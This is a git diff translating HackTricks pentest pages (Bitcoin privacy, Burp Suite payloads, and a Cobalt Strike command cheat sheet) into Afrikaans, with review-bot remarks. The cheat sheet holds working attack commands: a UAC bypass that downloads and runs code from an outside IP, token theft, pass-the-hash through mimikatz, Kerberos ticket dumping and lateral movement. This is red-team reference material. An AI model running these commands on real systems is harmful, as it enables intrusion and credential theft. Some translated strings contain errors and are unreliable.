-- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address. -- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable. +## **Verkeersanalise** -## **Traffic Analysis** +Deur netwerkverkeer te monitor, kan aanvallers moontlik transaksies of blokke aan IP-adresse koppel, wat die privaatheid van gebruikers in gevaar kan bring. Dit is veral waar as 'n entiteit baie Bitcoin-nodes bedryf, wat hul vermoë om transaksies te monitor verbeter. -By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions. - -## More -For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +## Meer +Vir 'n omvattende lys van privaatheidsaanvalle en verdedigings, besoek [Bitcoin Privacy op Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). -# Anonymous Bitcoin Transactions +# Anonieme Bitcoin Transaksies -## Ways to Get Bitcoins Anonymously +## Maniere om Bitcoins Anoniem te Kry -- **Cash Transactions**: Acquiring bitcoin through cash. -- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin. -- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining) -- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended. +- **Kontant Transaksies**: Bitcoin verkry deur kontant. +- **Alternatiewe Kontant**: Aankoop van geskenkkaarte en dit aanlyn ruil vir bitcoin. 
+- **Mynbou**: Die mees private metode om bitcoins te verdien is deur mynbou, veral wanneer dit alleen gedoen word, omdat mynbou-poele die IP-adres van die mynwerker kan weet. [Mynbou-poele-inligting](https://en.bitcoin.it/wiki/Pooled_mining) +- **Diefstal**: Teoreties kan die steel van bitcoin 'n ander metode wees om dit anoniem te bekom, alhoewel dit onwettig en nie aanbeveel word nie. -## Mixing Services +## Mengdienste -By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos. +Deur 'n mengdiens te gebruik, kan 'n gebruiker **bitcoins stuur** en **verskillende bitcoins in ruil ontvang**, wat dit moeilik maak om die oorspronklike eienaar op te spoor. Dit vereis egter vertroue in die diens om nie logboeke te hou en om die bitcoins werklik terug te gee. Alternatiewe mengopsies sluit Bitcoin-casinos in. ## CoinJoin -**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced. +**CoinJoin** voeg verskeie transaksies van verskillende gebruikers saam in een, wat die proses vir enigeen wat probeer om insette met uitsette te koppel, bemoeilik. Ten spyte van sy doeltreffendheid kan transaksies met unieke inset- en uitsetgroottes steeds potensieel nagespoor word. -Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. 
+Voorbeeldtransaksies wat moontlik CoinJoin gebruik het, sluit in `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` en `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners. +Vir meer inligting, besoek [CoinJoin](https://coinjoin.io/en). Vir 'n soortgelyke diens op Ethereum, kyk na [Tornado Cash](https://tornado.cash), wat transaksies anonimiseer met fondse van mynwerkers. ## PayJoin -A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities. - +'n Variasie van CoinJoin, **PayJoin** (of P2EP), vermom die transaksie tussen twee partye (bv. 'n kliënt en 'n handelaar) as 'n gewone transaksie, sonder die kenmerkende gelyke uitsette van CoinJoin. Dit maak dit uiters moeilik om op te spoor en kan die algemene-inset-eienaarskap-heuristiek wat deur transaksie-surveillance-entiteite gebruik word, ongeldig maak. ```plaintext 2 btc --> 3 btc 5 btc 4 btc ``` +Transaksies soos die bogenoemde kan PayJoin wees, wat privaatheid verbeter terwyl dit nie onderskeibaar is van standaard bitcoin-transaksies nie. -Transactions like the above could be PayJoin, enhancing privacy while remaining indistinguishable from standard bitcoin transactions. - -**The utilization of PayJoin could significantly disrupt traditional surveillance methods**, making it a promising development in the pursuit of transactional privacy. 
+**Die gebruik van PayJoin kan tradisionele bewakingsmetodes aansienlik ontwrig**, wat dit 'n belowende ontwikkeling maak in die strewe na transaksionele privaatheid. -# Best Practices for Privacy in Cryptocurrencies +# Beste Praktyke vir Privatiteit in Kriptogeldeenhede -## **Wallet Synchronization Techniques** +## **Balgelykmaak van Beursies Tegnieke** -To maintain privacy and security, synchronizing wallets with the blockchain is crucial. Two methods stand out: +Om privaatheid en veiligheid te handhaaf, is dit noodsaaklik om beursies met die blokketting te sinchroniseer. Twee metodes steek uit: -- **Full node**: By downloading the entire blockchain, a full node ensures maximum privacy. All transactions ever made are stored locally, making it impossible for adversaries to identify which transactions or addresses the user is interested in. -- **Client-side block filtering**: This method involves creating filters for every block in the blockchain, allowing wallets to identify relevant transactions without exposing specific interests to network observers. Lightweight wallets download these filters, only fetching full blocks when a match with the user's addresses is found. +- **Volle knoop**: Deur die hele blokketting af te laai, verseker 'n volle knoop maksimum privaatheid. Alle transaksies wat ooit gemaak is, word plaaslik gestoor, wat dit onmoontlik maak vir teenstanders om te identifiseer watter transaksies of adresse die gebruiker belangstel. +- **Kliëntkant blokfiltering**: Hierdie metode behels die skep van filters vir elke blok in die blokketting, wat beursies in staat stel om relevante transaksies te identifiseer sonder om spesifieke belange aan netwerkwaarnemers bloot te stel. Ligte beursies laai hierdie filters af en haal slegs volle blokke binne wanneer 'n ooreenstemming met die gebruiker se adresse gevind word. 
-## **Utilizing Tor for Anonymity** +## **Die Gebruik van Tor vir Anonimiteit** -Given that Bitcoin operates on a peer-to-peer network, using Tor is recommended to mask your IP address, enhancing privacy when interacting with the network. +Aangesien Bitcoin op 'n eweknie-netwerk werk, word dit aanbeveel om Tor te gebruik om jou IP-adres te verberg en sodoende privaatheid te verbeter wanneer jy met die netwerk skakel. -## **Preventing Address Reuse** +## **Voorkoming van Adres Hergebruik** -To safeguard privacy, it's vital to use a new address for every transaction. Reusing addresses can compromise privacy by linking transactions to the same entity. Modern wallets discourage address reuse through their design. +Om privaatheid te beskerm, is dit noodsaaklik om 'n nuwe adres vir elke transaksie te gebruik. Adres hergebruik kan privaatheid in gevaar bring deur transaksies aan dieselfde entiteit te koppel. Moderne beursies ontmoedig adres hergebruik deur hul ontwerp. -## **Strategies for Transaction Privacy** +## **Strategieë vir Transaksie-Privaatheid** -- **Multiple transactions**: Splitting a payment into several transactions can obscure the transaction amount, thwarting privacy attacks. -- **Change avoidance**: Opting for transactions that don't require change outputs enhances privacy by disrupting change detection methods. -- **Multiple change outputs**: If avoiding change isn't feasible, generating multiple change outputs can still improve privacy. +- **Meervoudige transaksies**: Die opsplitting van 'n betaling in verskeie transaksies kan die transaksiebedrag verdoesel, wat privaatheidsaanvalle voorkom. +- **Vermyding van wisselgeld**: Die keuse vir transaksies wat nie wisselgeld-uitsette vereis nie, verbeter privaatheid deur wisselgeld-opsporingsmetodes te ontwrig. +- **Meervoudige wisselgeld-uitsette**: As die vermyding van wisselgeld nie haalbaar is nie, kan die skep van meervoudige wisselgeld-uitsette steeds privaatheid verbeter. 
-# **Monero: A Beacon of Anonymity** +# **Monero: 'n Baken van Anonimiteit** -Monero addresses the need for absolute anonymity in digital transactions, setting a high standard for privacy. +Monero spreek die behoefte aan absolute anonimiteit in digitale transaksies aan en stel 'n hoë standaard vir privaatheid. -# **Ethereum: Gas and Transactions** +# **Ethereum: Gas en Transaksies** -## **Understanding Gas** +## **Begrip van Gas** -Gas measures the computational effort needed to execute operations on Ethereum, priced in **gwei**. For example, a transaction costing 2,310,000 gwei (or 0.00231 ETH) involves a gas limit and a base fee, with a tip to incentivize miners. Users can set a max fee to ensure they don't overpay, with the excess refunded. +Gas meet die berekeningspoging wat nodig is om operasies op Ethereum uit te voer, geprijs in **gwei**. Byvoorbeeld, 'n transaksie wat 2,310,000 gwei (of 0.00231 ETH) kos, behels 'n gaslimiet en 'n basisfooi, met 'n fooi om mynwerkers te motiveer. Gebruikers kan 'n maksimumfooi instel om te verseker dat hulle nie te veel betaal nie, met die oortollige bedrag wat terugbetaal word. -## **Executing Transactions** +## **Uitvoering van Transaksies** -Transactions in Ethereum involve a sender and a recipient, which can be either user or smart contract addresses. They require a fee and must be mined. Essential information in a transaction includes the recipient, sender's signature, value, optional data, gas limit, and fees. Notably, the sender's address is deduced from the signature, eliminating the need for it in the transaction data. +Transaksies in Ethereum behels 'n afsender en 'n ontvanger, wat beide gebruikers- of slimkontrakadresse kan wees. Hulle vereis 'n fooi en moet gemyn word. Essensiële inligting in 'n transaksie sluit die ontvanger, die afsender se handtekening, waarde, opsionele data, gaslimiet en fooie in. 
Merkwaardig word die afsender se adres afgelei uit die handtekening, wat die behoefte daaraan in die transaksiedata elimineer. -These practices and mechanisms are foundational for anyone looking to engage with cryptocurrencies while prioritizing privacy and security. +Hierdie praktyke en meganismes is fundamenteel vir enigiemand wat betrokke wil raak by kriptogeldeenhede terwyl privaatheid en veiligheid vooropgestel word. -## References +## Verwysings * [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) * [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) @@ -201,16 +195,14 @@ These practices and mechanisms are foundational for anyone looking to engage wit
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
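Review bot: the term for a Bitcoin change output is inconsistent within this file. The heading and opening paragraph render it as `UTXO-veranderingsadresopsporing` / `veranderingsadres` (change in the sense of alteration), while the later bullets and the best-practices list use `wisselgeld` (`Transaksies sonder wisselgeld`, `Vermyding van wisselgeld`). Pick one term, preferably `wisselgeld`, and apply it to the UTXO heading, to `Onnodige Invoerheuristiek (Optimale Veranderingsheuristiek)` and to `Indien die toevoeging van meer insette die uitset groter maak`, which also dropped the word "change" from the source sentence ("makes the change output larger"). Three other slips in the same hunk: `## **Balgelykmaak van Beursies Tegnieke**` does not translate "Wallet Synchronization Techniques" (the paragraph under it already says `sinchroniseer`, so `Beursie-sinchronisasietegnieke` would match), `geprijs` in the Ethereum gas paragraph is Dutch spelling where Afrikaans has `geprys`, and `Privatiteit` in `# Beste Praktyke vir Privatiteit in Kriptogeldeenhede` should be `Privaatheid`, the form used everywhere else in the file.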
- - diff --git a/burp-suite.md b/burp-suite.md index bc9169270..42a345e3e 100644 --- a/burp-suite.md +++ b/burp-suite.md @@ -1,29 +1,27 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-# Basic Payloads +# Basiese Payloads -* **Simple List:** Just a list containing an entry in each line -* **Runtime File:** A list read in runtime (not loaded in memory). For supporting big lists. -* **Case Modification:** Apply some changes to a list of strings(No change, to lower, to UPPER, to Proper name - First capitalized and the rest to lower-, to Proper Name -First capitalized an the rest remains the same-. -* **Numbers:** Generate numbers from X to Y using Z step or randomly. -* **Brute Forcer:** Character set, min & max length. +* **Eenvoudige lys:** Net 'n lys met 'n inskrywing in elke lyn +* **Runtime-lêer:** 'n Lys wat tydens uitvoering gelees word (nie in geheue gelaai nie). Vir ondersteuning van groot lyste. +* **Gevalverandering:** Pas sekere veranderinge toe op 'n lys van strings (Geen verandering, na kleinletters, na GROOTLETTERS, na 'n korrekte naam - Eerste letter in hoofletters en die res na kleinletters -, na 'n korrekte naam - Eerste letter in hoofletters en die res bly dieselfde -. +* **Getalle:** Genereer getalle vanaf X tot Y met 'n stap van Z of lukraak. +* **Brute Forcer:** Karakterset, minimum & maksimum lengte. -[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload to execute commands and grab the output via DNS requests to burpcollab. +[https://github.com/0xC01DF00D/Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) : Payload om opdragte uit te voer en die uitset deur DNS-versoeke na burpcollab te gryp. {% embed url="https://medium.com/@ArtsSEC/burp-suite-exporter-462531be24e" %} @@ -32,16 +30,14 @@ Other ways to support HackTricks:
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
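Review bot: `**Gevalverandering:**` mistranslates "Case Modification" in the payload list; the Intruder option changes letter case, so something like `Letterkas-verandering` is meant, and `korrekte naam` for "Proper name" should be `Eienaam`. That bullet also carries over the unbalanced parenthesis from the English source (`(Geen verandering, ... die res bly dieselfde -.` never closes), which is worth fixing while the line is being rewritten anyway. Separately, the translated sponsor header/footer does not match the one committed in the previous file: this file uses `hacking-truuks` and `GitHub-opslagplekke`, the previous one `haktruuks` and `github-opslag`. Since the same block is repeated at the top and bottom of every page, one wording should be chosen and reused across the whole patch.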
- - diff --git a/c2/cobalt-strike.md b/c2/cobalt-strike.md index d0c3e70ae..e72ce61d0 100644 --- a/c2/cobalt-strike.md +++ b/c2/cobalt-strike.md 
@@ -1,217 +1,206 @@ # Cobalt Strike -### Listeners +### Luisteraars -### C2 Listeners +### C2 Luisteraars -`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more. +`Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` dan kan jy kies waar om te luister, watter soort beacon om te gebruik (http, dns, smb...) en meer. -### Peer2Peer Listeners +### Peer2Peer Luisteraars -The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons. +Die beacons van hierdie luisteraars hoef nie direk met die C2 te praat nie, hulle kan daarmee kommunikeer deur ander beacons. -`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons +`Cobalt Strike -> Luisteraars -> Toevoegen/Bewerken` dan moet jy die TCP of SMB beacons kies -* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect ` from another beacon -* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`. +* Die **TCP beacon sal 'n luisteraar op die gekose poort stel**. Om aan te sluit by 'n TCP beacon gebruik die opdrag `connect ` van 'n ander beacon +* Die **smb beacon sal luister in 'n pypnaam met die gekose naam**. Om aan te sluit by 'n SMB beacon moet jy die opdrag `link [target] [pipe]` gebruik. 
-### Generate & Host payloads +### Genereer & Berg payloads op -#### Generate payloads in files +#### Genereer payloads in lêers -`Attacks -> Packages ->` +`Aanvalle -> Pakkette ->` -* **`HTMLApplication`** for HTA files -* **`MS Office Macro`** for an office document with a macro -* **`Windows Executable`** for a .exe, .dll orr service .exe -* **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs) +* **`HTMLApplication`** vir HTA lêers +* **`MS Office Macro`** vir 'n kantoor dokument met 'n makro +* **`Windows Uitvoerbare`** vir 'n .exe, .dll of diens .exe +* **`Windows Uitvoerbare (S)`** vir 'n **stageless** .exe, .dll of diens .exe (beter stageless as staged, minder IoCs) -#### Generate & Host payloads +#### Genereer & Berg payloads op -`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python +`Aanvalle -> Web Drive-by -> Geskripteerde Web Aflewering (S)` Dit sal 'n skrip/uitvoerbare lêer genereer om die beacon van cobalt strike af te laai in formate soos: bitsadmin, exe, powershell en python -#### Host Payloads +#### Berg Payloads op -If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config. +As jy reeds die lêer het wat jy wil berg in 'n webbediener, gaan net na `Aanvalle -> Web Drive-by -> Berg Lêer op` en kies die lêer om op te berg en webbediener konfigurasie. -### Beacon Options +### Beacon Opsies -
# Execute local .NET binary
+
# Voer plaaslike .NET binêre uit
 execute-assembly </path/to/executable.exe>
 
-# Screenshots
-printscreen    # Take a single screenshot via PrintScr method
-screenshot     # Take a single screenshot
-screenwatch    # Take periodic screenshots of desktop
-## Go to View -> Screenshots to see them
+# Skermskote
+printscreen    # Neem 'n enkele skermskoot via die PrintScr metode
+screenshot     # Neem 'n enkele skermskoot
+screenwatch    # Neem periodieke skermskote van die skerm
+## Gaan na View -> Skermskote om hulle te sien
 
-# keylogger
+# sleutellogger
 keylogger [pid] [x86|x64]
-## View > Keystrokes to see the keys pressed
+## View > Keystrokes om die gedrukte sleutels te sien
 
-# portscan
-portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
+# poortskandering
+portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Injecteer poortskandering aksie binne 'n ander proses
 portscan [targets] [ports] [arp|icmp|none] [max connections]
 
 # Powershell
-# Import Powershell module
+# Importeer Powershell module
 powershell-import C:\path\to\PowerView.ps1
-powershell <just write powershell cmd here>
+powershell <skryf net powershell opdrag hier>
 
-# User impersonation
-## Token generation with creds
-make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token generated with make_token
-## The use of make_token generates event 4624: An account was successfully logged on.  This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type.  As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
+# Gebruiker simulasie
+## Token generasie met geloofsbriewe
+make_token [DOMAIN\user] [password] # Skep 'n token om 'n gebruiker in die netwerk te simuleer
+ls \\computer_name\c$ # Probeer om die gegenereerde token te gebruik om toegang te verkry tot C$ op 'n rekenaar
+rev2self # Hou op om die token wat gegenereer is met make_token te gebruik
+## Die gebruik van make_token genereer gebeurtenis 4624: 'n Rekening is suksesvol aangemeld. Hierdie gebeurtenis is baie algemeen in 'n Windows domein, maar kan beperk word deur te filtreer op die Aanmeldingstipe. Soos hierbo genoem, gebruik dit LOGON32_LOGON_NEW_CREDENTIALS wat tipe 9 is.
 
 # UAC Bypass
-elevate svc-exe <listener>
-elevate uac-token-duplication <listener>
+elevate svc-exe <luisteraar>
+elevate uac-token-duplication <luisteraar>
 runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
 
-## Steal token from pid
-## Like make_token but stealing the token from a process
-steal_token [pid] # Also, this is useful for network actions, not local actions
-## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
-ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
-rev2self # Stop using token from steal_token
+## Steel token van pid
+## Soos make_token, maar steel die token van 'n proses
+steal_token [pid] # Dit is ook nuttig vir netwerkaksies, nie plaaslike aksies nie
+## Uit die API-dokumentasie weet ons dat hierdie aanmeldingstipe "die oproeper in staat stel om sy huidige token te kloon". Dit is hoekom die Beacon-uitset sê Impersonated <current_username> - dit simuleer ons eie gekloonde token.
+ls \\computer_name\c$ # Probeer om die gegenereerde token te gebruik om toegang te verkry tot C$ op 'n rekenaar
+rev2self # Hou op om die token van steal_token te gebruik
 
-## Launch process with nwe credentials
-spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
-## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE).  It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
+## Lancering van proses met nuwe geloofsbriewe
+spawnas [domain\username] [password] [luisteraar] # Doen dit vanaf 'n gids met leestoegang soos: cd C:\
+## Soos make_token, sal dit Windows-gebeurtenis 4624 genereer: 'n Rekening is suksesvol aangemeld, maar met 'n aanmeldingstipe van 2 (LOGON32_LOGON_INTERACTIVE). Dit sal die oproepende gebruiker (TargetUserName) en die gesimuleerde gebruiker (TargetOutboundUserName) beskryf.
 
-## Inject into process
-inject [pid] [x64|x86] [listener]
-## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
+## Injecteer in proses
+inject [pid] [x64|x86] [luisteraar]
+## Vanuit 'n OpSec-oogpunt: Moenie kruisplatform-injectie uitvoer tensy jy regtig moet nie (bv. x86 -> x64 of x64 -> x86).
 
-## Pass the hash
-## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
+## Pass die hash
+## Hierdie wysigingsproses vereis patching van LSASS-geheue wat 'n hoë-risiko-aksie is, vereis plaaslike admin-voorregte en is nie altyd lewensvatbaar as Protected Process Light (PPL) geaktiveer is nie.
 pth [pid] [arch] [DOMAIN\user] [NTLM hash]
 pth [DOMAIN\user] [NTLM hash]
 
-## Pass the hash through mimikatz
+## Pass die hash deur mimikatz
 mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
-## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
-steal_token <pid> #Steal token from process created by mimikatz
+## Sonder /run, sal mimikatz 'n cmd.exe spawn, as jy as 'n gebruiker met 'n skerm hardloop, sal hy die skerm sien (as jy as SYSTEM hardloop, is jy reg om te gaan)
+steal_token <pid> #Steel token van proses wat deur mimikatz geskep is
 
-## Pass the ticket
-## Request a ticket
+## Pass die kaartjie
+## Versoek 'n kaartjie
 execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
-## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
+## Skep 'n nuwe aanmeldsessie om saam met die nuwe kaartjie te gebruik (om nie die gekompromitteerde een te oorskryf nie)
 make_token <domain>\<username> DummyPass
-## Write the ticket in the attacker machine from a poweshell session & load it
+## Skryf die kaartjie in die aanvaller se masjien vanuit 'n poweshell-sessie & laai dit
 [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
 kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
 
-## Pass the ticket from SYSTEM
-## Generate a new process with the ticket
+## Pass die kaartjie vanaf SYSTEM
+## Skep 'n nuwe proses met die kaartjie
 execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
-## Steal the token from that process
+## Steel die token van daardie proses
 steal_token <pid>
 
-## Extract ticket + Pass the ticket
-### List tickets
+## Haal kaartjie uit + Pass die kaartjie
+### Lys kaartjies
 execute-assembly C:\path\Rubeus.exe triage
-### Dump insteresting ticket by luid
+### Dump interessante kaartjie deur luid
 execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
-### Create new logon session, note luid and processid
-execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
-### Insert ticket in generate logon session
-execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
-### Finally, steal the token from that new process
+### Skep 'n nuwe aanmeldsessie, neem luid en proses-ID op
+execute-assembly C:\pad\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
+### Voeg kaartjie in in gegenereerde aanmeldsessie
+execute-assembly C:\pad\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-kaartjie...]
+### Steel uiteindelik die token van daardie nuwe proses
 steal_token <pid>
 
-# Lateral Movement
-## If a token was created it will be used
-jump [method] [target] [listener]
-## Methods:
-## psexec                    x86   Use a service to run a Service EXE artifact
-## psexec64                  x64   Use a service to run a Service EXE artifact
-## psexec_psh                x86   Use a service to run a PowerShell one-liner
-## winrm                     x86   Run a PowerShell script via WinRM
-## winrm64                   x64   Run a PowerShell script via WinRM
+# Laterale beweging
+## As 'n token geskep is, sal dit gebruik word
+jump [metode] [teiken] [luisteraar]
+## Metodes:
+## psexec                    x86   Gebruik 'n diens om 'n Service EXE-artefak uit te voer
+## psexec64                  x64   Gebruik 'n diens om 'n Service EXE-artefak uit te voer
+## psexec_psh                x86   Gebruik 'n diens om 'n PowerShell-eenreëliner uit te voer
